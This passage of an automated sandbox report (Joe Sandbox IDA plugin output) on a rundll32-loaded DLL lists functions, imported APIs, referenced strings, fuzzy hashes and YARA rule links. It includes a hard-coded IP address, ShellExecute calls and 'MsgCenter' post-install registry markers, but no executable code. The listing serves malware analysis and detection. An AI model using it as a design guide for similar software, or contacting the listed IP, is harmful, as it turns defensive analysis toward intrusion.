Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: memmove
String ID:
API String ID: 2162964266-0
Opcode ID: f48e30d42f7362a3489efc8b4fb4b1d86e67ce5bf115bf63e3aa4bcefc4ad982
Instruction ID: 461c31f9552aa3729a5e6565f135de1ccc8cc925f396947b96927f6322aea50e
Opcode Fuzzy Hash: f48e30d42f7362a3489efc8b4fb4b1d86e67ce5bf115bf63e3aa4bcefc4ad982
Instruction Fuzzy Hash: A6014B72604B8486DA999F02B84439AA6A4F799FC0F58C034AF9A1BB1ACE7CC2518700

Uniqueness

Uniqueness Score: -1.00%

Function 000000018001D048 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 33COMMON

Download Yara Rule

APIs

Part of subcall function 0000000180001900: SHGetPathFromIDListW.SHELL32 ref: 000000018000190C

StrCmpNIW.SHLWAPI ref: 000000018001D071
StrCmpNIW.SHLWAPI ref: 000000018001D08B

Part of subcall function 0000000180002DE4: wcsncmp.MSVCRT ref: 0000000180002E06
Part of subcall function 0000000180002DE4: wcsncmp.MSVCRT ref: 0000000180002E20

Strings

http://, xrefs: 000000018001D067
https://, xrefs: 000000018001D081

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: wcsncmp$FromListPath
String ID: http://$https://
API String ID: 1354619976-1916535328
Opcode ID: f0180345e040584d079c5b24169db75a70be302b2ca9e14ca998ae6b14b2d4e5
Instruction ID: 3b4f654c0190b1c660da69d9b707c9435e3e8476667423005c0f2b5f6a7ba28a
Opcode Fuzzy Hash: f0180345e040584d079c5b24169db75a70be302b2ca9e14ca998ae6b14b2d4e5
Instruction Fuzzy Hash: 21F06D30314B4D81FBD3AB22ED807E92361A74DBC0F08D026BE128B681EE29C79DC701

Uniqueness

Uniqueness Score: -1.00%

Function 000000018001B0D4 Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 000000018001B112
GetModuleFileNameW.KERNEL32 ref: 000000018001B129
PathRemoveFileSpecW.SHLWAPI ref: 000000018001B134
PathAddBackslashW.SHLWAPI ref: 000000018001B13F

Part of subcall function 0000000180015AF4: memmove.MSVCRT(?,?,?,0000000180013360), ref: 0000000180015B51

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: FilePath$BackslashModuleNameRemoveSpecmemmovememset
String ID:
API String ID: 1398880316-0
Opcode ID: 124879481a9aa2e00d01ebae9109725b2fe3f2f688dd831a4adbc46c5dd73c81
Instruction ID: 22643bada24b11d976684183b583204a4ee84c872d42e87ba640a329a3643701
Opcode Fuzzy Hash: 124879481a9aa2e00d01ebae9109725b2fe3f2f688dd831a4adbc46c5dd73c81
Instruction Fuzzy Hash: 14015E71214A8882EA60DB21F85539A6320F78A7A9F404221BAAD476E9DF3DC24DCB04

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180073130 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 205COMMON

Download Yara Rule

APIs

__pctype_func.MSVCRT ref: 00000001800731E1

Strings

(null), xrefs: 00000001800731B1
(null), xrefs: 000000018007318A

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: __pctype_func
String ID: (null)$(null)
API String ID: 3630429742-1601437019
Opcode ID: 0065adc6453a10d9ccc5162ae3c07d97aa8578f8e3d986a6a80ec195f80303d0
Instruction ID: 4da43dc6e52408ab09b3749884352dd554f5e104f70e5d3a12e7d890f492f9a7
Opcode Fuzzy Hash: 0065adc6453a10d9ccc5162ae3c07d97aa8578f8e3d986a6a80ec195f80303d0
Instruction Fuzzy Hash: 0F81F07221068886FBEB8F2880523E967A1F749BD4F44D115FE4A57798DF3ECA89C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180042CB8 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 192COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,0000000180042715), ref: 0000000180042D94

Part of subcall function 000000018001AD68: InitializeCriticalSection.KERNEL32(?,?,?,?,?,000000018001AFD5), ref: 000000018001ADCE

Strings

Connection: Keep-Alive, xrefs: 0000000180042DE3
Cache-Control: no-cache, xrefs: 0000000180042E08

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: ByteCharCriticalInitializeMultiSectionWide
String ID: Cache-Control: no-cache$Connection: Keep-Alive
API String ID: 2071930665-2797312137
Opcode ID: 390d372ab0f8ca9c8d35a5c5b59fa4f1daf8a60d35f223fc70caf0e07e2a75eb
Instruction ID: 06b1c2be51b69464b9694ee66dce0eee22d8a6c444c0793ba53430c965e4d999
Opcode Fuzzy Hash: 390d372ab0f8ca9c8d35a5c5b59fa4f1daf8a60d35f223fc70caf0e07e2a75eb
Instruction Fuzzy Hash: 6971B172300E9886EB96DF26D4807DD3760FB89BD8F86C625BE2947B85CF31D6598304

Uniqueness

Uniqueness Score: -1.00%

Function 000000018003A138 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 102COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 000000018003A3B9

Strings

map/set<T> too long, xrefs: 000000018003A3B2

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: Xinvalid_argumentstd::_
String ID: map/set<T> too long
API String ID: 909987262-1285458680
Opcode ID: 4f8b5c4a4b7dfd174ba02e61296e3cf7ea921cc7912cdcef76d88542124505ce
Instruction ID: b716ba77de4695a230c5cde56cb36caf30baef682964767987e615475274616d
Opcode Fuzzy Hash: 4f8b5c4a4b7dfd174ba02e61296e3cf7ea921cc7912cdcef76d88542124505ce
Instruction Fuzzy Hash: 17419E32208F8881EAA2CF25E84039E73A4F399BE0F558225EF9D43B95DF39C556C740

Uniqueness

Uniqueness Score: -1.00%

Function 000000018001C31C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 102COMMON

Download Yara Rule

APIs

PathFindFileNameW.SHLWAPI ref: 000000018001C340
wcscmp.MSVCRT ref: 000000018001C398

Strings

RUNDLL32, xrefs: 000000018001C38E

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: FileFindNamePathwcscmp
String ID: RUNDLL32
API String ID: 3222201028-252960710
Opcode ID: cb23065da29cb40e9b09dc38cb932cba9fa4c45224ed154b04bc2c1aad3b4612
Instruction ID: 4f5a5794d41fc096d520f70cd288b3f3e4e93d0d03317b7f7fc332b0f1d573f2
Opcode Fuzzy Hash: cb23065da29cb40e9b09dc38cb932cba9fa4c45224ed154b04bc2c1aad3b4612
Instruction Fuzzy Hash: 87412932711A5896EB919F39C84479C2360FB49BB8F548312EA3D47BE9DF34CA99C344

Uniqueness

Uniqueness Score: -1.00%

Function 000000018005944C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 85COMMON

Download Yara Rule

APIs

swprintf.LEGACY_STDIO_DEFINITIONS ref: 0000000180059556
_wcsicmp.MSVCRT ref: 0000000180059563

Strings

%X%X%X%X, xrefs: 0000000180059547

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: _wcsicmpswprintf
String ID: %X%X%X%X
API String ID: 6652212-3817614625
Opcode ID: 5a4a0ef71a518b7b1e42a9ee04a4acde75a59ea632b103e90386aeff25023f9c
Instruction ID: 5baa55fa5f1c5327c79efc128b9da1770f88ddfa4c7447b56b890561a4175455
Opcode Fuzzy Hash: 5a4a0ef71a518b7b1e42a9ee04a4acde75a59ea632b103e90386aeff25023f9c
Instruction Fuzzy Hash: 2C3129B36166C446FBA39FA4A4013ED7BA0E7197C4F48C126F6C647696DA2FC64AC700

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000D718 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 84timeCOMMON

Download Yara Rule

APIs

Part of subcall function 000000018000A7AC: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000180001020), ref: 000000018000A7D5

GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,000000018000C25C), ref: 000000018000D7AF
_wtoi64.MSVCRT ref: 000000018000D7B8

Strings

__LastModified__, xrefs: 000000018000D757

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: Time$FileHeapProcessSystem_wtoi64
String ID: __LastModified__
API String ID: 76029450-3092259212
Opcode ID: 4a951d53cc273b8493fc538d7d39a9e91a9e5a3ce9ebdf176f309d42d7b01bf9
Instruction ID: 78280a3659b5bbb0132e7b878d74b07e121d7b65ff89b3d97cbad59726871672
Opcode Fuzzy Hash: 4a951d53cc273b8493fc538d7d39a9e91a9e5a3ce9ebdf176f309d42d7b01bf9
Instruction Fuzzy Hash: E231A272701B4882EA55DB69E800399B360F789BE4F54C226EB6D077E9DF38C649C740

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180019224 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00000001800192B3
ExpandEnvironmentStringsW.KERNEL32 ref: 00000001800192CA

Part of subcall function 000000018000A7AC: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000180001020), ref: 000000018000A7D5

Strings

%userprofile%, xrefs: 00000001800192C3, 0000000180019309

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: EnvironmentExpandHeapProcessStringsmemset
String ID: %userprofile%
API String ID: 513494641-4287493773
Opcode ID: 6171552488bcb95b8598f81a13bd2917bbfc5c9e60312d18e151e2b76805b3ef
Instruction ID: afa807702e792aa2111ef114b343d602a6a47e8eed4e3e29c3f3eed9658e9f14
Opcode Fuzzy Hash: 6171552488bcb95b8598f81a13bd2917bbfc5c9e60312d18e151e2b76805b3ef
Instruction Fuzzy Hash: 86214A31311A4891EA92DB65EC853DA3360FB88BE4F419215A66D473E1DF38C7898700

Uniqueness

Uniqueness Score: -1.00%

Function 000000018004AF08 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON

Download Yara Rule

APIs

ShellExecuteW.SHELL32 ref: 000000018004AF73

Part of subcall function 00000001800495A4: GetTickCount.KERNEL32 ref: 00000001800495AC
Part of subcall function 00000001800495A4: srand.MSVCRT ref: 00000001800495B4
Part of subcall function 00000001800495A4: GetCurrentProcessId.KERNEL32 ref: 00000001800495BA
Part of subcall function 00000001800495A4: GetCurrentProcessId.KERNEL32 ref: 00000001800495CE
Part of subcall function 00000001800495A4: ??_U@YAPEAX_K@Z.MSVCRT ref: 00000001800495FA
Part of subcall function 00000001800495A4: GetTokenInformation.ADVAPI32 ref: 0000000180049629
Part of subcall function 00000001800495A4: GetSidSubAuthorityCount.ADVAPI32 ref: 0000000180049636
Part of subcall function 00000001800495A4: GetLastError.KERNEL32 ref: 000000018004963F
Part of subcall function 00000001800495A4: GetSidSubAuthority.ADVAPI32 ref: 0000000180049658
Part of subcall function 00000001800495A4: ??_V@YAXPEAX@Z.MSVCRT ref: 000000018004967B

Part of subcall function 00000001800494C4: ??_U@YAPEAX_K@Z.MSVCRT ref: 00000001800494DA

memset.MSVCRT ref: 000000018004AF8E

Strings

p, xrefs: 000000018004AF7D

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: AuthorityCountCurrentProcess$ErrorExecuteInformationLastShellTickTokenmemsetsrand
String ID: p
API String ID: 526592482-2181537457
Opcode ID: db20606bd2f8c5ddcc62ab015699e8350b9eea6392e973e239eb88e586f6bc5b
Instruction ID: c7a46caf8343ac9de693e6305f929c410170157657da93c1511d6525c5ccc842
Opcode Fuzzy Hash: db20606bd2f8c5ddcc62ab015699e8350b9eea6392e973e239eb88e586f6bc5b
Instruction Fuzzy Hash: B221B632208F8885E7A1DF51F48078AB3A4F799BC4F158021BE8D43B59DF38C549CB44

Uniqueness

Uniqueness Score: -1.00%

Function 000000018004B054 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON

Download Yara Rule

APIs

ShellExecuteW.SHELL32 ref: 000000018004B0BF

Part of subcall function 00000001800495A4: GetTickCount.KERNEL32 ref: 00000001800495AC
Part of subcall function 00000001800495A4: srand.MSVCRT ref: 00000001800495B4
Part of subcall function 00000001800495A4: GetCurrentProcessId.KERNEL32 ref: 00000001800495BA
Part of subcall function 00000001800495A4: GetCurrentProcessId.KERNEL32 ref: 00000001800495CE
Part of subcall function 00000001800495A4: ??_U@YAPEAX_K@Z.MSVCRT ref: 00000001800495FA
Part of subcall function 00000001800495A4: GetTokenInformation.ADVAPI32 ref: 0000000180049629
Part of subcall function 00000001800495A4: GetSidSubAuthorityCount.ADVAPI32 ref: 0000000180049636
Part of subcall function 00000001800495A4: GetLastError.KERNEL32 ref: 000000018004963F
Part of subcall function 00000001800495A4: GetSidSubAuthority.ADVAPI32 ref: 0000000180049658
Part of subcall function 00000001800495A4: ??_V@YAXPEAX@Z.MSVCRT ref: 000000018004967B

Part of subcall function 00000001800494C4: ??_U@YAPEAX_K@Z.MSVCRT ref: 00000001800494DA

memset.MSVCRT ref: 000000018004B0DA

Strings

p, xrefs: 000000018004B0C9

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: AuthorityCountCurrentProcess$ErrorExecuteInformationLastShellTickTokenmemsetsrand
String ID: p
API String ID: 526592482-2181537457
Opcode ID: f2d62255b16ca96ed2cbf9c0141287d8586ff51f1b7a2213e7ec1c807b59ad21
Instruction ID: 630a19f9e7c8d33164371876bc9408f173fd4fcd3dffaf0243fab21a92527801
Opcode Fuzzy Hash: f2d62255b16ca96ed2cbf9c0141287d8586ff51f1b7a2213e7ec1c807b59ad21
Instruction Fuzzy Hash: E1217432204F8885E7A1DF61F48078AB7A4F788BC4F558121FE8883B5ADF38C654CB44

Uniqueness

Uniqueness Score: -1.00%

Function 000000018005F710 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48COMMON

Download Yara Rule

APIs

SHGetValueW.SHLWAPI ref: 000000018005F77C

Strings

PopMode, xrefs: 000000018005F769
MsgCenter, xrefs: 000000018005F73F

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: Value
String ID: MsgCenter$PopMode
API String ID: 3702945584-2846135548
Opcode ID: 807311447c7977bc8b33d9be7fe6c7b7d00b2d03e5d7c1a808eae8ec46eca954
Instruction ID: a6ee570e9f05dd3d93d952f782ca0f0a524d3c9233dfd77d85df1269c81f99b6
Opcode Fuzzy Hash: 807311447c7977bc8b33d9be7fe6c7b7d00b2d03e5d7c1a808eae8ec46eca954
Instruction Fuzzy Hash: 8E1156B6215B4886EB618F24D4447AA77A0F789BB4F008316FB79037E4DF79C648CB44

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180019344 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON

Download Yara Rule

APIs

GetWindowsDirectoryW.KERNEL32 ref: 0000000180019384
_cwprintf_s_l.LIBCMT ref: 00000001800193CA

Strings

\%s, xrefs: 00000001800193C0

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: DirectoryWindows_cwprintf_s_l
String ID: \%s
API String ID: 3550698841-3138977447
Opcode ID: be0de64675aae2549b2b95bd78edae8e98cc066a07bd437e28ca68cac17cf7a4
Instruction ID: 837965eb2492d6bb7ff6843ea12300395ea1822b4df9255b2825bafc1b5bbc5d
Opcode Fuzzy Hash: be0de64675aae2549b2b95bd78edae8e98cc066a07bd437e28ca68cac17cf7a4
Instruction Fuzzy Hash: 5E117331204A8841EBA1DB21E8553CA63A0F78DBD5F909321AEAD837D5DF3CC745C740

Uniqueness

Uniqueness Score: -1.00%

Function 000000018005AFB8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43COMMON

Download Yara Rule

APIs

SHGetValueW.SHLWAPI ref: 000000018005B020

Strings

opentime_afterinstall, xrefs: 000000018005B00D
MsgCenter, xrefs: 000000018005AFE8

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: Value
String ID: MsgCenter$opentime_afterinstall
API String ID: 3702945584-3718352646
Opcode ID: bc51746a4845ef3513b79512763e58b7b7c59a9adac5c6c1a917732545d0aad2
Instruction ID: 9121a4dbc030fef007b745f88a0fe18748c482634fd5ebee216f5006264a8ac8
Opcode Fuzzy Hash: bc51746a4845ef3513b79512763e58b7b7c59a9adac5c6c1a917732545d0aad2
Instruction Fuzzy Hash: AC116A72600B4482EB508F29E44438AB760F789BF4F108316EB79437E4CF79C688CB84

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180074CC0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40sleepthreadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0000000180074CD8
Sleep.KERNEL32(?,171.8.167.45,?,0000000180074FBF,?,?,?,?,?,?,000000018006F6BE), ref: 0000000180074CF4

Strings

171.8.167.45, xrefs: 0000000180074CCB

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: CurrentSleepThread
String ID: 171.8.167.45
API String ID: 1164918020-2723241389
Opcode ID: b82daa9be066ead2ec14612a1a02b00537e7c47846788e1f0fd2d6a2c4d35c95
Instruction ID: 739a1f1183ec9c18e579ba8ee55cb859ca32a6d953d7c9429809cc63265ca520
Opcode Fuzzy Hash: b82daa9be066ead2ec14612a1a02b00537e7c47846788e1f0fd2d6a2c4d35c95
Instruction Fuzzy Hash: B201D13370425586E7A3DFA9B88039E66A0F74C7E0F058431FF4487655EF79C99A8B80

Uniqueness

Uniqueness Score: -1.00%

Function 000000018005B060 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 37COMMON

Download Yara Rule

APIs

SHSetValueW.SHLWAPI ref: 000000018005B0BD

Strings

opentime_afterinstall, xrefs: 000000018005B0AA
MsgCenter, xrefs: 000000018005B07E

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: Value
String ID: MsgCenter$opentime_afterinstall
API String ID: 3702945584-3718352646
Opcode ID: 5bc7ba386a7905614b99b0fc8fa89d0a447947fd7441929353b8c1a08fc42a0a
Instruction ID: 21b9b515d364e76d08f8b9de98a0e6c83aa7314f475d7e108810017b28aec3e9
Opcode Fuzzy Hash: 5bc7ba386a7905614b99b0fc8fa89d0a447947fd7441929353b8c1a08fc42a0a
Instruction Fuzzy Hash: DA0188B2611B4482DB10DF69D854389B760F788BB0F00831AEA79137E4DF78C699CB44

Uniqueness

Uniqueness Score: -1.00%

Function 000000018005B310 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 37COMMON

Download Yara Rule

APIs

SHSetValueW.SHLWAPI ref: 000000018005B36D

Strings

opentime_afterupdate, xrefs: 000000018005B35A
MsgCenter, xrefs: 000000018005B32E

Memory Dump Source

